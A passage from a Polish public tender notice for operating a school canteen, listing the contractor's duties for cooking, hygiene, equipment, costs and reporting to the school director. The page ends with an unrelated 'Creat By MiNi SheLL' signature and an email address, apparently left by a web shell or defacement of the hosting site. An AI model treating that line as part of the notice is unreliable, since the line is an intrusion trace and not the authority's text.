3/ gotowanie posiłków zgodnie z tygodniowymi jadłospisami - zatwierdzonymi przez Dyrektora Gimnazjum oraz przedstawiciela Rady Rodziców.
4/ podawanie posiłków w godzinach i ilości ustalonej przez Dyrektora Gimnazjum
5/ sprzątanie i mycie naczyń
6/ utrzymywanie w należytym stanie technicznym i sanitarnym pomieszczenia kuchni, stołówki oraz wyposażenia
2.	Posiłki przygotowywać zgodnie z obowiązującymi przepisami sanitarno - epidemiologicznymi i standardami żywieniowymi dotyczącymi dzieci i młodzieży szkolnej
3.	Przy zakupie produktów żywnościowych stosować przepisy ustawy o zamówieniach publicznych.
4.	. Każdego miesiąca rozliczać koszty posiłków - informacje przedkładać Dyrektorowi Gimnazjum, Radzie Rodziców . Dyrektor Gimnazjum, przedstawiciele Rady Rodziców oraz osoby upoważnione przez Dyrektora Gimnazjum mają prawo kontroli dokumentacji Wykonawcy w zakresie wykonywanej usługi, zaś w przypadku nie udostępnienia dokumentacji lub niezgodnego jej prowadzenia z niniejszą SIWZ z Wykonawcą zostanie rozwiązana umowa o usługę z jego winy.
5.	. Wykonawca zobowiązany jest zapewnić do obsługi osoby posiadające stosowne i aktualne badania lekarskie. Ponosi całkowitą odpowiedzialność za stan sanitarny kuchni i stołówki, w tym realizuje postanowienia i decyzje dotyczące funkcjonowania i obsługi kuchni oraz stołówki szkolnej. Zapewnić uczniom terminowe wydawanie posiłków.
6.	. Zakres prac obejmuje ponadto następujące czynności:
1)Porządkowanie i dezynfekcja urządzeń kuchennych i naczyń
2)Mycie otworów okiennych w pomieszczeniach kuchni, stołówki oraz pomieszczeń
    pomocniczych.
            3) Dbałość o czystość ścian i powierzchni podłogowych - w miarę potrzeby wykonuje 
                 malowanie ścian.
str.4
7.	Zamawiający zabezpiecza dostawy energii elektrycznej do urządzeń zainstalowanych w  kuchni na własny koszt.
8.	Wykonawca:
1)Odpowiada za należyty stan urządzeń kuchennych i naczyń. Remonty bieżące i uzupełnianie stanu naczyń wykonuje na bieżąco i we własnym zakresie
2)W przypadku awarii urządzeń technicznych powierzonych wykonawcy spowodowanych jego winą - remontu dokonuje we własnym zakresie
3) Wykonawca na własny koszt wyposaża kuchnię w niezbędne urządzenia techniczne dostosowane do własnych źródeł zasilania.
4)Wykonawca z własnych środków zakupuje gaz .
5) Wykonawca ponosi pełną odpowiedzialność za przestrzeganie przepisów BHP i przeciw pożarowych - odpowiada przed jednostkami kontrolującymi. 
6)Wykonawca z własnych środków wyposaża kuchnię i stołówkę w środki czyszczące, piorące, dezynfekujące, ścierki, ręczniki oraz ubrania ochronne dla pracujących osób
7)W przypadku przygotowania posiłków dla osób nie będących uczniami klas 0 - VI Szkoły Podstawowej lub I-III Gimnazjum pobiera za nie pełną odpłatność z uwzględnieniem kosztów lokalowych, amortyzacji, energii i obsługi. ?  pobranej kwoty za posiłki z tytułu eksploatacji kuchni, ceny energii,  należy przekazać na konto Urzędu Gminy w rozliczeniu miesięcznym w terminie 7 dni. 
8)Wykonawca zobowiązany jest w uzgodnieniu z Dyrektorem Gimnazjum obsłużyć uroczystości i zajęcia szkolne w dniach wolnych od pracy w tym, w okresie ferii oraz wykonywać inne prace zlecone przez Dyrektora Gimnazjum a związane z prowadzeniem i obsługą kuchni oraz stołówki.
9)W przypadku zmniejszenia liczby osób korzystających z posiłków w okresie obowiązywania umowy kwota ustalona w przetargu zostanie pomniejszona o odpowiedni %.
Liczba dzieci korzystająca ze stołówki ( dwa dania) - ok. 350 uczniów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.52.31.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com